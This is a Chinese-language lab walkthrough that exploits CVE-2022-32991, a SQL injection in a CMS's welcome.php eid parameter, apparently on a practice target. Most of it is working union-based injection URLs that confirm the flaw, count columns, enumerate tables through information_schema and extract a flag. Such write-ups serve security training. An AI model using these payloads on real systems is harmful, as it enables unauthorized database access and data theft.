CVE-2022-32991简介
由漏洞信息可知:该CMS系统的welcome.php中存在SQL注入漏洞,可注入参数为eid。
开启靶场
发现有注册页面,先注册任意账户,然后登录进入系统。
进入系统之后发现当前url中存在一个参数q,与cve报告中的参数不符,接着寻找。点击start按钮之后,跳转到新的页面,新的url中出现了eid参数,开始进行注入测试。
注入测试
验证漏洞
?q=quiz&step=2&eid=60377db362694'&n=1&t=34
添加单引号之后报错,可推测为单引号闭合的字符型注入。
判断字段数
?q=quiz&step=2&eid=60377db362694' order by 5--+&n=1&t=34
order by 5时显示正常,order by 6时报错,证明字段数为5。
判断回显位
?q=quiz&step=2&eid=60377db362694' union select 1,2,3,4,5--+&n=1&t=34
可知回显位为3。
查询数据库
?q=quiz&step=2&eid=60377db362694' union select 1,2,database(),4,5--+&n=1&t=34
可知当前数据库为ctf。
查询表名
?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+&n=1&t=34
发现表flag,猜测flag就在里面。
查询字段名
?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='flag'--+&n=1&t=34
发现表flag中只有一个字段flag,直接查询即可。
查询flag
?q=quiz&step=2&eid=60377db362694' union select 1,2,flag,4,5 from flag--+&n=1&t=34
成功获取flag:flag{9e82e6f7-b063-4638-8fa6-c81794710d11}